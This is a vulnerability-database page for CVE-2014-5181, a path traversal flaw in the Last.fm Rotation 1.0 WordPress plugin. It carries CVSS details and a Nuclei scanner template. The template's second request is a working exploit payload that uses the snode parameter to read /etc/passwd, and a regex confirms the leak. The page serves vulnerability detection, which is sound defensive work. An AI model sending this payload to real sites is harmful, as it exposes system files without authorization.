Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2014-5181
HistorySep 03, 2024 - 7:08 a.m.

Last.fm Rotation 1.0 - Path Traversal

2024-09-0307:08:09
ProjectDiscovery
github.com
2
last.fm rotation plugin
directory traversal
cve-2014-5181
wordpress
lfi
remote attackers

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7

Confidence

Low

EPSS

0.15

Percentile

95.9%

JSON
Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter.

id: CVE-2014-5181

info:
  name: Last.fm Rotation 1.0 - Path Traversal
  author: DhiyaneshDK
  severity: medium
  description: |
    Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter.
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-5181
    cwe-id: CWE-22
    epss-score: 0.00845
    epss-percentile: 0.82498
    cpe: cpe:2.3:a:last.fm_rotation_plugin_project:lastfm-rotation_plugin:1.0:*:*:*:*:wordpress:*:*
  metadata:
    vendor: last.fm_rotation_plugin_project
    product: lastfm-rotation_plugin
    framework: wordpress
  tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,lastfm-rotation

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/lastfm-rotation/")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204ec2c1ec272175f1a216887b21255e30b7579788096bb7e399291f2b3c6beac1022100c569a83ce0b1ea82e5df1fba4314afaac2b46b399779994ac3663a12daf643e0:922c64590222798bb761d5b6d8e72950

Related

prion 1
cvelist 1
cve 1
wpvulndb 1
patchstack 1
nvd 1
prion
prion
Directory traversal
2014-08-06 19:55:00
cvelist
cvelist
CVE-2014-5181
2014-08-06 19:00:00
cve
cve
CVE-2014-5181
2014-08-06 19:55:04
wpvulndb
wpvulndb
Last.fm Rotation 1.0 - lastfm-proxy.php snode Parameter Remote Path Traversal File Access
2014-09-19 06:07:20
patchstack
patchstack
WordPress Last.FM Rotation Plugin <= 3.3 - Local File Inclusion
2014-08-06 00:00:00
nvd
nvd
CVE-2014-5181
2014-08-06 19:55:04

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7

Confidence

Low

EPSS

0.15

Percentile

95.9%

JSON
Related for NUCLEI:CVE-2014-5181
prion1cvelist1cve1wpvulndb1patchstack1nvd1